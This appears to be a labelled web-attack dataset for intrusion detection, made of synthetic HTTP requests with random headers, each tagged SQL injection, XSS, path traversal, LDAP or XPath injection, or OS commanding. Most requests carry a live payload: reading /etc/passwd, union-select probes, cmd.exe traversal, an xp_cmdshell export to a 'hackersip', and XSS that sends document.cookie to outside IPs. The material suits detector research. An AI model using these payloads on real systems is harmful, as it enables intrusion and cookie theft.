GET /336GcyHsvWnKSR/r2tsusj5slde2oh/np4zU/wwEa7bostewavcsrX.css?at0shh3on8Na=bintwmw&yd6onvtaecew=se32erhpositionhlsEmailos&ushl=%7C+++++cat+++%2Fetc%2Fpasswd++++%7C&1servicesincludeMPLcR=899&si=+Oegsl%2Btusrcpe0&iwf=iv%28z&mshaaiw=Legr5k HTTP/1.1
Host: www.r4lrd.gov:80
Connection: keep-alive
Accept: video/mpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=0289
Client-ip: 72.77.48.25
Cookie: leaXEn=-7;SfasooVhriel=frtcoOErh5radmeo;ievr=755535
Cookie2: $Version="4"
Date: Tue, 10 Jul 07 14:54:03 CET
ETag: "21fLlo7mOtYun2Bj1tw"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Wed, 05 Jan 05 14:56:12 UTC
If-Unmodified-Since: Mon, 30 Apr 07 12:24:45 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 03 May 07 08:33:34 CET
Max-Forwards: 16
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM enJvaHVucXplRnN4ZnRlZWVkMzhwZnQ4cjJqeXRhaDlxdDAyZQ==
Authorization: etaa aNekh=ei2r
Range: -3
Referer: http://www.8aegLaux.biz/lrLe4/aRea2eed/tE3l/tltme/zd1syacl.msf
TE: trailers
Trailer: From
User-Agent: fe2i (lRz@mdh)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4509x153
Via: 2.7 234.49.214.176, 8.2 www.vir8g.css
Transfer-Encoding: compress
Upgrade: 8atc6a/5.7, oCej/1.5, Siiai/7.2
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43334
Start - Id: 37030
class: LdapInjection
GET /2bn/kf57mRnyaOZtL/iFQ9G@2453-NggIEyix.shtml?neeo3=302500&dr6htrE6etsll=69026637&hacm=lAA0&soyoe3ttuze7ge=84141211&eniemhpAsoa=5&tkezihmnc0qsuRd=sHsszes3ttaoW&N6=saeovbscript92&q3wvInerxc0ns=%29++++%28%7C+++%28Csu2H%3Dnseor*%29&gRIPv0Ub=shuto&YkL8d9=mayTitonfaed&ces=ewi&l7AraR7tn5b=8musmurusrl1varcphieva&suao9uontoeInu=axp_i&dwA7eqodnltsE=t9j6HwNc7tG HTTP/1.1
Host: www.t0lr.org:80
Connection: 0TTgg
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic, iso-10646-ucs-2
Accept-Encoding: identity;q=0.2, gzip;q=0.1
Accept-Language: ou-oAqdzi4;q=0.2, eAqe4git-e7d, nt-6, 24rqeto-ga;q=0.5
Cache-Control: sbo='Rhnnatt'
Client-ip: 102.194.71.136
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="1"
Date: Tue, 08 Nov 05 14:10:32 UTC
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 3033
MIME-Version: 5.5
Pragma: sgpo='rneptn'
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 13730-521,976-,-1177
Referer: http://www.raneenm.be/uodro/anLisnin.css
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.0 (Windows; U; Win98 1.5; yt-nm; rv:8.0.3) Gecko/61933783
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37030
Start - Id: 45923
class: PathTransversal
GET /epX.uEbTPPc3/aMEiVSnPJ9Xhh3PIk/qWsz6keB6Q./mphfenriuahmJddTezrm/exss/lHTRxvB0Tj/o9aqzqpEUiy_Kb.jpg?s4z=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&cnwgoee=oe7WeltcoaenD&ZpbSeMQqEqL=yhttpwshutdowncjrm%27ztaeosst1 HTTP/1.0
Host: 192.151.231.239:06457
Connection: close
Accept: image/png;q=0.2, application/zip;q=0.4
Accept-Charset: iso-8859-4;q=0.4, x-mac-arabic;q=0.7, iso-8859-7, x-mac-cyrillic, windows-1255
Accept-Encoding: *
Accept-Language: ai-uhto;q=0.1, rtanp6e2-5ht, be5el-eaeb, a2aan-yno0
Cache-Control: no-cache
Client-ip: 81.172.25.192
Cookie: 2dnaFOeessxu0E=r4D-J1-Obmu@;Tldocumentv-kDbgsound@j=yu;nstyley;sEDl1eerpihn0=t8TN_
Cookie2: $Version="3"
Date: Wed, 28 Apr 10 09:24:21 GMT
ETag: "1MT.AVtNT_x-4Gm"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sat, 02 Apr 05 19:13:49 CET
If-Unmodified-Since: Fri, 23 Nov 07 04:04:26 UTC
If-Match: *
If-None-Match: "ZbHgGvpNTxCkWcx-"
If-Range: Tue, 29 Aug 06 09:38:11 GMT
Max-Forwards: 2812
MIME-Version: 1.5
Pragma: si0p8=tstx9N
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest cnonce="amEepahy"
Range: 434-766527,-7
Referer: http://www.I2neivi.biz/1it8ir/esdoysh/rebOihnt/knyln.wmn
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: eiuseq
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 880x5284
Via: 8.3 www.2olsy.jpg, FTP/5.6 27.228.231.219, s86/9.5 179.201.212.119
Transfer-Encoding: Afso; hr3yea=t1jia
Upgrade: dhvol/0.8, Pde/4.9
Warning: 039 www.rwdtitz.jpeg "i8opqaZazoijrn" "Fri, 21 Apr 06 07:33:49 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45923
Start - Id: 40989
class: SqlInjection
GET /8Apahree5Ze/md_.ecwt6jV.eRwZ.c4w.aspx? HTTP/1.0
Host: www.elf7JbthEp.be:33
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress
Accept-Language: so-dtw6n;q=0.0, et-lRet, n-lzo;q=0.8
Cache-Control: max-stale=98
Client-ip: 77.120.70.59
Cookie: dreet=sCa0eeeaoksLOnl;z7ihnioeXaib=@Niyessescb;nsdnmsalD=o3E;jdaaiclmgetcl=exec  xp_cmdshell 'bcp "select  *    from     dto8n8"    queryout  pwdump.exe  -c   -Craw  -Shackersip   -Usa -Ph8ck3r';wagvo5f2UU7=Tler]tsamdiusan;imgjleeh;aiLmamoezsp7oh=802271338
Cookie2: $Version="20"
Date: Thu, 12 Feb 09 04:38:20 GMT
ETag: "i4Vz-emCDc7sO@ASroJa"
Expect: 100-continue
If-Unmodified-Since: Fri, 25 Apr 08 02:32:40 GMT
If-None-Match: "I2ilV@ZEsOWjj_GGfag_"
If-Range: *
Max-Forwards: 454
MIME-Version: 6.6
Pragma: lnRebhu=rEe
Proxy-Authorization: eTana laqleFs=Eaesr
Referer: http://www.Yi1autmo.biz/rJcut94/grptSti7/cvtoo/Trn0m/ee5ae.tar.gz
Trailer: Upgrade
User-Agent: aHhekorltcfecvrn1
Via: 4.8 www.eHaili.shtml, 8.6 www.srcrN.gif, 4.6 www.haatc.js
Warning: 756 www.ed0onobi.js "aAcSecoa6a" "Mon, 09 Jan 06 22:50:09 CET"
X-Forwarded-For: 206.74.116.140
X-Serial-Number: 30942101
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40989
Start - Id: 48781
class: XPathInjection
GET /vm1acaairEesta/6e7r.php3?duOtendaht=78657657&ono7nqta25l=atsf9&one=%3Aan+oobetweenc%3C&oecuio=ui80Vv68.K&tkotnFllcRle=Euto%27+++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++++%27fnd46Hee%27++%3D%27&pjSV@I6hQO=itdgaptTgdaetnpiR&7a=l9childonsysokeEsep&sWei6etrmatuxxm=D%26&otdtd=0&eezuwnoEe3=m%26yscriptinserta HTTP/1.0
Host: 237.245.111.78:307
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.160.12.174
Cookie: t1fatrtE=75911955
Cookie2: $Version="19"
Date: Sat, 29 Apr 06 16:02:54 GMT
ETag: "OBU@UM7En1vWUhLG2"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Sun, 18 Jul 04 01:41:08 GMT
If-Unmodified-Since: Sat, 01 May 10 03:09:12 CET
If-Match: "RqlN6x1uNiyYhq9"
If-None-Match: *
If-Range: "Hht5g1_0RxjQCKvG9"
Max-Forwards: 08
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Basic SXRtN3JpOnJvb2U=
Range: 512488-28725,-179,34439-
Referer: http://eeiTpos.cz/qdbiogs/wqat/oacsh/9mahe8Az/coYa.css
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: pSB@ldd http://www.htdax.fr
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 6.6 249.219.98.166, 6.0 20.134.188.20, 4.0 220.184.37.58
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48781
Start - Id: 35273
class: SqlInjection
GET /1xDCWXSrftsd/lxq7-S4JT-2lLqEj0JNZ/wso/iooieuwa/kjx4vi.iaLt7ckpEs7@9.mdb?t9=ee2s&rq6tteptm5dS=2&rdaTNubstopIi=ce2rr&dxsjesu9Y57a=8213&Nidtiimttesw=%27+union++++select+++++%40%40version%2C1%2C1%2C1--&tahne6kToi=89738&Ijonl=u%40wp-dneo%3DnEqx&smddij=mtnf%27IOeh%3Dy HTTP/1.0
Host: 46.130.100.203
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 155.132.155.102
Cookie: r2n4nhentRrreno=<1kcopy;yrbrdse0snno=qOIadlI1y50E
Cookie2: $Version="75"
Date: Sat, 28 Aug 04 24:34:38 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: 100-continue
From: B9ir@tOlwn.gov
If-Modified-Since: Sun, 08 Jan 06 18:15:37 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:22:25 CET
If-Match: ".M9tQIMHGSKPZ0v"
If-None-Match: "M@lM3Gui-xmWYKigQ"
If-Range: Sun, 15 Jul 07 08:27:02 CET
Max-Forwards: 736
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://www.litqauh.ch/anqiihem/eeizpt/padei.mdb
TE: trailers
Trailer: Proxy-Authorization
User-Agent: ybtz (k87f@Xa)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: identity
Upgrade: p0emTn/7.1, nmstn/3.3
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35273
Start - Id: 47397
class: XSS
GET /1wo6fSwreacIY/i_gd@T@JihzsI@YM4xC/rbrq2.js?ierreftgedhtrod=+j%3BlUetmpscn&7tmprdFwN_H=5303&CMCRCCzx=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F192.108.36.31%2Fislama.msf%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&reh0=the%7Cimgwp-++reus HTTP/1.1
Host: www.sliDabr.de
Connection: oruiap
Accept: image/*, audio/*
Accept-Charset: x-mac-greek, cp-936;q=0.7, x-mac-turkish, cp-932
Accept-Encoding: identity, gzip;q=0.7, deflate;q=0.3, identity
Accept-Language: caesm-3syopTo, lbhdfl-lerwNes3, rsARos-bshihyn;q=0.6
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Tue, 28 Nov 06 06:28:49 GMT
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: iszdhne@t6e8rl.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: "DGEqqFou1F_O41rZkQ"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 8237
MIME-Version: 0.3
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: nltq a0s8=xoEe
Range: 3529-807061,329-36,-0646
Referer: /nNubaxq/E9iiicrh/e4fn1.dll
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 0.1; ep-t8; rv:9.6.2) Gecko/29275985
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/8.2 www.cesEt6.css:17, 2.4 117.124.89.41:87271, 3.6 www.7tgnfle.jpg
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 805 www.etFooy.png "eaacsEipcsy" "Tue, 21 Sep 04 14:03:42 CET"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47397
Start - Id: 45399
class: PathTransversal
POST /ieNdVi8UV-W.CYS/iwflkhryt/te/g9BTkzlW2Lnph-Ch.png? HTTP/1.1
Content-Length: 78
Content-Language: ravr
Content-Encoding: deflate
Content-Location: http://hciRido.uk/egwp9bs.swf
Content-MD5: YXRlcnR5ZklvbW1zcmlUcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Jul 09 08:08:37 UTC
Last-Modified: Thu, 21 Oct 04 24:13:15 UTC
Host: 148.201.117.111
Connection: close
Accept: application/*
Accept-Charset: windows-1253
Accept-Encoding: gzip, deflate, compress;q=0.3
Accept-Language: te-ms
Cache-Control: only-if-cached
Client-ip: 2.231.241.65
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sat, 06 Nov 04 18:35:34 GMT
ETag: W/"-yfA6unXQjL3zd2"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "1Nl7wxjnA0ktGHewCH"
If-None-Match: *
If-Range: Tue, 25 Apr 06 20:47:21 UTC
Max-Forwards: 74
MIME-Version: 1.9
Pragma: g=eLdcnsm
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Digest username="isysa"
Range: 96447-,026-322
Referer: http://www.ka9n6rld.ch/tpba/saw5hbl/nwg5Wgsi.dll
TE: trailers,deflate,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/6.6 (X11; U; Unix 9.4; it-Xd; rv:6.8.0) Gecko/25878830
UA-CPU: MIPS
UA-Disp: 088,174,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 5gamT/1.8 118.86.132.84, HTTP/4.3 253.95.173.116, ebtE/1.3 113.240.31.129
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 335 www.lrsn.css "oRaie" "Sat, 09 Aug 08 10:06:34 GMT"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vNiti=\WINDOWS\system.ini&wdeleteUZOHc9OZg=geebtTmobject&qft=iewlw8rlsmner

End - Id: 45399
Start - Id: 41365
class: SqlInjection
PUT /Ve5cessteeZuwu/Cjsampdaccess_logevEd/FIQV_qex9k/1aELhf9_X9DZ.bin? HTTP/1.1
Content-Length: 118
Content-Language: rsa,mts
Content-Encoding: gzip
Content-Location: /njarmE3t.swf
Content-MD5: ZWdkZWxTU280RHdybmFtOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 11:55:04 UTC
Last-Modified: Fri, 12 Oct 07 19:50:02 UTC
Host: www.hnhwstsioo.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.6, gzip;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 200.4.215.226
Cookie: nsndfebcapi=01517941;RQI.=nhicognnsa
Cookie2: $Version="620"
Date: Wed, 24 Oct 07 23:15:43 UTC
ETag: W/"J_IZ-Sru.NlxdAHqGD"
Expect: 100-continue
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Thu, 26 Feb 09 02:11:47 UTC
If-Match: "SWFru0JFVzrFD92"
If-None-Match: *
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 07
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: slrj iSieor=iOaoa
Referer: http://www.D9tE.st/Awre/usbest/gr7lawdh/cgxtphce.sh
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: 9lee/6.9.1
UA-Disp: 557,1073,8
UA-OS: Windows 98
UA-Color: color32
Via: 9.7 129.117.251.55:96324, stwN/6.7 119.26.188.85
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

uem4=7&pw8eontjee=888829121&ficr1u3hdaehedl=1085&m6a4oa=sSah&nsoke='    union    select  @@version,1,1,1--

End - Id: 41365
Start - Id: 36054
class: PathTransversal
GET /catOAechoiM7.jsp?ggto=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&arafqi5doiO=hogmr&ceRattaxDoE=39497334&hevalph=1536&hgp2E=fromhttpafibnran%7E&rqli=oy7auOloS4j0&KHWiUFr3=%2F6eemroscriptgEl5%40r HTTP/1.1
Host: www.aGerxSm.de
Connection: keep-alive
Accept: video/*;q=0.1, video/mpeg, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: ajc='t'
Client-ip: 87.101.49.90
Cookie: anreEmnBi=sK9jACM;eYsl=iaccept;tiaRahhlA3llma=e7.;U6NC8tmp0x2Q5=|echo5I rlikeqgroup bynj h%ed;ztdcov=3;iRml=a1Ji8QUR
Cookie2: $Version="12"
Date: Sun, 28 Nov 04 15:23:21 GMT
ETag: W/"uHw4nlcHQ8W74qHyy"
Expect: sntd
From: Odatte@nazuaen.net
If-Modified-Since: Fri, 09 Jun 06 04:35:55 GMT
If-Unmodified-Since: Tue, 27 Oct 09 15:27:39 UTC
If-Match: *
If-None-Match: *
If-Range: "a9tDZTJhOb2dAVvPjTOa"
Max-Forwards: 3646
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -676,1810-88717,49-
Referer: http://www.8catsm.gov/e7G7.tar
TE: trailers,trailers
Trailer: Warning
User-Agent: araici
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.3 8.9.78.53:22, HTTP/0.0 252.195.190.33
Transfer-Encoding: eare
Upgrade: ia1tsT/0.5, s0tear/3.3, emk/4.1, teba/2.1, nt5/9.5
Warning: 919 47.112.49.170 "uvicSPonns9rssR" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36054
Start - Id: 47965
class: XSS
GET /uAou8PyP/uqaNJRKAWp1QrnZr/ises/een4rjxten9eiendm/Xj2G/VYu/0e7kteecnn2cit7p/4ON_tNUOdocument.pl?hAE=ah&estn5f=nIA7IpsKBl&-Q3SRWEmB2=147&g9Isnn1gRei0=n7onh5hteSufweho&EeTnmoeRc7ps=%3Cdiv++style+++%3D+++%22width%3A++++expression%28%5Bwindow.open%28%27http%3A%2F%2F163.128.154.124%2Fllst.sh%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+++%3E&wsebG=nqAJZGwmU&rahxUoAhmsl=ig.UX6Rs&eutchm8o=njFc%40PWGjGxJ&pges=yq&hhnu=3 HTTP/1.1
Host: 118.62.225.33
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=103
Client-ip: 231.93.232.112
Cookie: yiipnen=2dmNce0u(y
Cookie2: $Version="96"
Date: Sun, 15 Feb 09 20:25:45 UTC
ETag: "09Q5lWaU@8rfp_chN"
Expect: wfi0bT8t=li0ate
From: isoa@fisS8tee.org
If-Modified-Since: Fri, 10 Apr 09 05:30:48 GMT
If-Unmodified-Since: Mon, 29 Nov 04 11:26:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0841
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: trut 5fSp=ieys3
Range: 82558-60324,82-20188
Referer: http://zt6acyr.st/akyp/oaas/Rtthra/e4atesmc.tar.gz
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 2.1; nn-ng; rv:0.7.7) Gecko/81610092
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3364x532
Via: HTTP/0.6 154.251.187.152, 8.2 www.narpnnt7.jpg
Transfer-Encoding: gzip
Upgrade: rtapt1/5.2, rgc8o/0.8, sdqf/6.2, htnEe/1.1
Warning: 193 185.105.110.73:7 "etrva5uwtemespwn" "Wed, 04 Oct 06 16:34:42 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47965
Start - Id: 36992
class: LdapInjection
GET /5lmutegta/e6ek1K7SHD3s0v7/Roige/sMVqKqtPzJAWW55VK/wmDiotmen8rsgupIee/aX2/Pt/cZJP.jsp?dskhoc=aOS%29%28+++%7C+++%28mho%3D*%29&gGOGmA=bgtX.Pw-X&SbnToGydhrnmet=etdom&seohtrdtau3=na+%289eaj8ke&PCx81SxpUh=etegrs%2BAehee&G-2geB@I=oasecho%5Co&oehizimre=fsanlocationa%3Fn HTTP/1.1
Host: 249.70.139.125:80
Connection: ooKiiE
Accept: */*
Accept-Charset: x-mac-chinesesimp, iso-8859-2
Accept-Encoding: *;q=0.9
Accept-Language: z-rUkwspyu, rttmr-ehhye, hDrrrTrt-nie, edy2sxe-e, hoe-eg
Cache-Control: min-fresh=8
Client-ip: 9.220.179.73
Cookie: no=pqe;7xFittnandtejm=Lw't3o;aavditsrobca=position8i  r[gcaawhere07r;hn=rtrgi;blogw6O0G=toeeieaoykrecatndp
Cookie2: $Version="0"
Date: Sat, 26 Jul 08 07:06:16 CET
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: gsYli
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Sun, 30 Jul 06 07:30:50 CET
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 139
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: Basic YXRwaTowSWV5OGxj
Authorization: Basic aThpYWVoOlRvaXJvZQ==
Range: 84-,-422477,1197-5319
Referer: /hUitaatb/aipee/yropuSw/niFIr2/ihno.shtml
TE: trailers
Trailer: User-Agent
User-Agent: tdezmeei1 (vpKEyp5Tt; dT6YTdrMx_)
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: 4.2 www.coseza.png:522
Transfer-Encoding: deflate
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 135 249.137.139.161 "EeTeptifzxaoiar" "Fri, 26 Jun 09 16:27:58 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36992
Start - Id: 36621
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 179.23.58.248:80
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Sun, 04 May 08 08:41:29 GMT
ETag: W/"JDtCZoEZuAvr_k5"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Fri, 01 Jan 10 08:05:58 CET
If-Unmodified-Since: Sat, 03 Mar 07 16:07:00 GMT
If-Match: *
If-None-Match: *
If-Range: "Hy7Yen2Nw_C8liEHvP"
Max-Forwards: 2
MIME-Version: 1.9
Pragma: o='Ui'
Proxy-Authorization: Digest qop=auth-int
Authorization: tDus rndeoby=anuya
Range: -8,4-,75-7
Referer: http://lnat.it/lnXatea/i8poea/7yoha/uss6i.dll
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.1 (X11; U; Linux i386 1.8; EE-1s; rv:5.4.4) Gecko/88494830
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: deflate
Upgrade: tweo/0.1, sfyot5/8.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36621
Start - Id: 35766
class: XPathInjection
GET /7mhhiihenuf/admininputpLFaIp@w7yz/L-B/leoTjch/ettwabLwVe/o0Ti7ye1ar/geeeeyesds/r--pRweQXexPw9x/GIo/d_J/eYean/o-mKhorWKDGRE5_C.swf?te=lJMM&jvYmI=la%27+++++or++++6++%3C++count%28path%2Fchild%3A%3A*%29+++or+%27rmjts6%27%3D++%27&eee=mcowoSenicedosU&ainlidisjleu=857&tL68udhredsbncc=krrb5pvoh&se4l0dbMg0Dhdl=rTdk%26c%5Dol&nrx=engo_B3D4U&gDzs7nfeegd=f1rrOhs&maof=-%2B&Veol5o6aeehafM=rhm%2FvUrflocationnz%40a&gahuart=Z1otobf&lt=05&.NOp=pkeY3dTol&pt7orneeenmcN=uW4k2X7Yh&AroustHaaoajom=xhihbyosl HTTP/1.1
Host: 184.251.123.140
Connection: boEesxa0
Accept: image/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: e-cb;q=0.1
Cache-Control: min-fresh=44617
Client-ip: 75.114.245.20
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Fri, 10 Sep 04 17:25:33 CET
